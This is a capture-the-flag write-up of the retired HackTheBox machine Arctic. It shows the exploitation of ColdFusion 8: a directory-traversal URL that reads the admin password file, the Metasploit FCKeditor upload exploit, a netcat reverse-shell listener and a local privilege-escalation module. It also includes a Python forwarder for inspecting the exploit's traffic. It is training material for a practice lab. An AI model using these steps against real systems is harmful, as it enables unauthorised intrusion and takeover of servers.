Arctic Challenge - HackTheBox

This writeup is for one of the Retired boxes on HackTheBox called Arctic [1].

Step 1 - Recon & Enumeration

I started with Nmap, UDP Proto Scanner, Nikto and DirBuster. Starting with Nmap, the scan was nmap -sSV -A -T4 10.10.10.11 (-sS needs root; -A adds OS detection, script scanning and traceroute on top of version detection).



Step 2 - Exploitation

Based on the results, I first checked whether there was any Metasploit module to use against port 135 (msrpc). MSRPC is Microsoft Remote Procedure Call, and there is a well-known Metasploit exploit for it, MS03_026_DCOM (exploit/windows/dcerpc/ms03_026_dcom), but it only applies to Windows NT/2000/XP/2003.

So I moved on to port 8500, where a ColdFusion 8 application was running. At the time I had not worked with a ColdFusion app before, so I went looking for information on how to exploit it [2].

So, what is ColdFusion?

ColdFusion is a web application development platform. The language used with it is also commonly called ColdFusion, but its proper name is ColdFusion Markup Language (CFML): ColdFusion is the server that processes CFML pages.

At the time there was only one ColdFusion exploit in Metasploit for version 8, and it did not succeed.

I tried:

 1. Directory traversal in
 http://[HOSTNAME:PORT]/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%en
 (the locale LFI that reads the administrator password hash out of password.properties [4])
 2. Brute-forcing the password at http://10.10.10.11:8500/CFIDE/componentutils/login.cfm?

But the ColdFusion 8 FCKeditor exploit (exploit/windows/http/coldfusion_fckeditor) was stuck in my mind and I couldn't understand why it wasn't working. So I decided to take another look at it and figure out why it was failing.



Debugging Exploits

There are three ways to check what is going wrong with a Metasploit exploit:

  1. In Metasploit, set VERBOSE true
  2. Open Wireshark and check the network traffic
  3. Intercept the request with Burp Suite and check the response

The first one didn't help at all: I set VERBOSE true but Metasploit didn't give me any extra information (VERBOSE only surfaces whatever the module author chose to log, so it is no substitute for looking at the wire). I was able to find out what was wrong with Wireshark first and then with Burp Suite.

Wireshark - Steps
 1. Fire up Wireshark and capture on tun0 (the HTB VPN interface)
 2. Set up your exploit in Metasploit, as shown in the image above
 3. Hit exploit and watch the traffic in Wireshark

Focus on the two HTTP packets: the first is our request (the payload upload) and the second is the response, which returns a 200. Right-click the HTTP response and choose Follow -> HTTP Stream to see what is going on.

Request


Response


So we do get a 200 response saying that our shell was uploaded, but the path is odd: /userfiles/file/FAOX.jsp/EQ0JQKNF.txt rather than /userfiles/file/FAOX.jsp. So what happens if I request /userfiles/file/FAOX.jsp directly; will my shell be executed?

I started a listener with nc -lvp 1233 (the port has to match the payload's LPORT) and browsed to

http://10.10.10.11:8500/userfiles/file/FAOX.jsp


Boom: reverse shell and user flag!

Burp Suite - Steps

You can also intercept the request and see what is going on with Burp Suite:

 1. In Metasploit, set RHOST to 127.0.0.1 and RPORT to 8500 (Image 1)
 2. In Burp Suite, go to Proxy - Options - Proxy Listeners - Add, bind to port 8500 and select Loopback only (Image 2)
 3. On the next tab (Request Handling), set Redirect to host to 10.10.10.11 and Redirect to port to 8500 (Image 3)

Image 1

Image 2

Image 3

So what we are doing here is sending our request to 127.0.0.1:8500 and having Burp redirect it to 10.10.10.11:8500. As a result we can intercept the request Metasploit sends, modify it, forward it and inspect the response.
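The Burp setup above is just a loopback listener that relays to the real host, and the same idea can be scripted when you want a plain record of what a module sent and what came back. The following is an added example, not code from this writeup or from Metasploit: it listens on 127.0.0.1:8500, forwards to 10.10.10.11:8500, logs the request line and the response status, and when the response echoes a /userfiles/file/ path it applies the observation from the Wireshark section (the JSP answers at the path truncated after .jsp, not at the reported <name>.jsp/<random>.txt). The FCKeditor-style reply and the upload request used by demo_local_roundtrip() are constructed stand-ins so the script runs offline; the connector URL in that request is an assumption taken from public descriptions of the module, not from this page.

```python
"""Loopback forwarder that intercepts a Metasploit HTTP exploit without Burp:
point RHOST/RPORT at LISTEN_ADDR, traffic is relayed to TARGET_ADDR and the
request line, status and any reported /userfiles/file/ path are logged."""
import re
import socket
import threading

LISTEN_ADDR = ("127.0.0.1", 8500)    # where msfconsole's RHOST/RPORT point
TARGET_ADDR = ("10.10.10.11", 8500)  # where the traffic is really redirected
UPLOAD_PATH_RE = re.compile(r"(/userfiles/file/[^\"'\s<>]+)")

def recv_until_idle(sock, first_timeout=5.0, idle_timeout=0.5):
    """Read one HTTP message: wait first_timeout for data, then stop on close/idle."""
    chunks = []
    sock.settimeout(first_timeout)
    try:
        while data := sock.recv(65536):
            chunks.append(data)
            sock.settimeout(idle_timeout)
    except socket.timeout:
        pass
    return b"".join(chunks)

def first_line(raw):
    """Space-split first line of a raw HTTP message, e.g. ['GET', '/x', 'HTTP/1.1']."""
    return raw.split(b"\r\n", 1)[0].decode("latin-1", "replace").split(" ")

def status_code(raw):
    """Numeric status of a raw HTTP response, 0 if there is no status line."""
    parts = first_line(raw)
    return int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0

def reported_upload_path(raw):
    """The /userfiles/file/... path echoed in the upload response, if any."""
    m = UPLOAD_PATH_RE.search(raw.decode("latin-1", "replace"))
    return m.group(1) if m else None

def real_shell_path(reported):
    """The writeup found the JSP at the path cut after '.jsp', not at '<name>.jsp/<random>.txt'."""
    m = re.match(r"(.*?\.jsp)", reported)
    return m.group(1) if m else reported

def relay_one(client, target_addr, log):
    """Forward one request/response pair, appending one-line summaries to log."""
    request = recv_until_idle(client)
    log.append("> " + " ".join(first_line(request)[:2]))
    with socket.create_connection(target_addr, timeout=5) as upstream:
        upstream.sendall(request)
        response = recv_until_idle(upstream)
    client.sendall(response)
    line = f"< {status_code(response)}"
    if reported := reported_upload_path(response):
        line += f" upload reported at {reported}; try {real_shell_path(reported)}"
    log.append(line)

def serve(listen_sock, target_addr, log, max_conns=None):
    """Accept connections and relay each; max_conns=None runs until killed."""
    handled = 0
    while max_conns is None or handled < max_conns:
        client, _ = listen_sock.accept()
        with client:
            relay_one(client, target_addr, log)
        handled += 1

# Constructed stand-ins (not captured traffic): the reply is modelled on the
# path the writeup observed; the connector URL in the request is assumed from
# public descriptions of the module, not taken from the writeup.
FAKE_BODY = (b'<script type="text/javascript">window.parent.OnUploadCompleted('
             b'0,"/userfiles/file/FAOX.jsp/EQ0JQKNF.txt","EQ0JQKNF.txt","");</script>')
FAKE_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nConnection: close\r\n"
                 b"Content-Length: %d\r\n\r\n" % len(FAKE_BODY) + FAKE_BODY)
FAKE_REQUEST = (b"POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/"
                b"upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1\r\n"
                b"Host: 10.10.10.11:8500\r\nContent-Length: 0\r\n\r\n")

def demo_local_roundtrip():
    """Forwarder vs a fake ColdFusion on loopback; returns (log, bytes client got)."""
    fake_cf = socket.create_server(("127.0.0.1", 0))
    def fake_server():
        conn, _ = fake_cf.accept()
        with conn:
            recv_until_idle(conn, idle_timeout=0.2)
            conn.sendall(FAKE_RESPONSE)
        fake_cf.close()
    threading.Thread(target=fake_server, daemon=True).start()
    proxy, log = socket.create_server(("127.0.0.1", 0)), []
    worker = threading.Thread(target=serve, daemon=True,
                              args=(proxy, fake_cf.getsockname(), log, 1))
    worker.start()
    with socket.create_connection(proxy.getsockname(), timeout=5) as msf:
        msf.sendall(FAKE_REQUEST)
        got = recv_until_idle(msf)
    worker.join(5)
    proxy.close()
    return log, got

if __name__ == "__main__":
    print("\n".join(demo_local_roundtrip()[0]))
```

Run it as-is to see the loopback demo; for the real thing, run serve(socket.create_server(LISTEN_ADDR), TARGET_ADDR, []) and set RHOST/RPORT in msfconsole to 127.0.0.1 and 8500. Unlike Burp it does not pause the request for editing, and the idle-timeout framing is a shortcut: a server that takes longer than first_timeout to start answering is logged as an empty response with status 0, which is itself a useful hint that the module's own timeout may be the problem.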

Step 3 - From User to Admin

So now we have a reverse shell as the user tolis; how do we go from that to Administrator?

First of all, I noticed that my shell kept breaking, and I wanted a Meterpreter session so I could run modules like post/multi/recon/local_exploit_suggester. My initial problem was that the box was 64-bit and I was using a 32-bit reverse TCP shell. Luckily, following this tutorial [5] I was able to get a stable shell and then move to Meterpreter.

Next, I ran post/multi/recon/local_exploit_suggester and it suggested only one exploit, ms10_092_schelevator (exploit/windows/local/ms10_092_schelevator). I fired it up and got SYSTEM.



References

[1] HackTheBox
[2] ColdFusion for Pentesters
[3] Attacking Adobe ColdFusion
[4] LFI to Shell in ColdFusion 6-10
[5] Remote shell using Meterpreter and PowerShell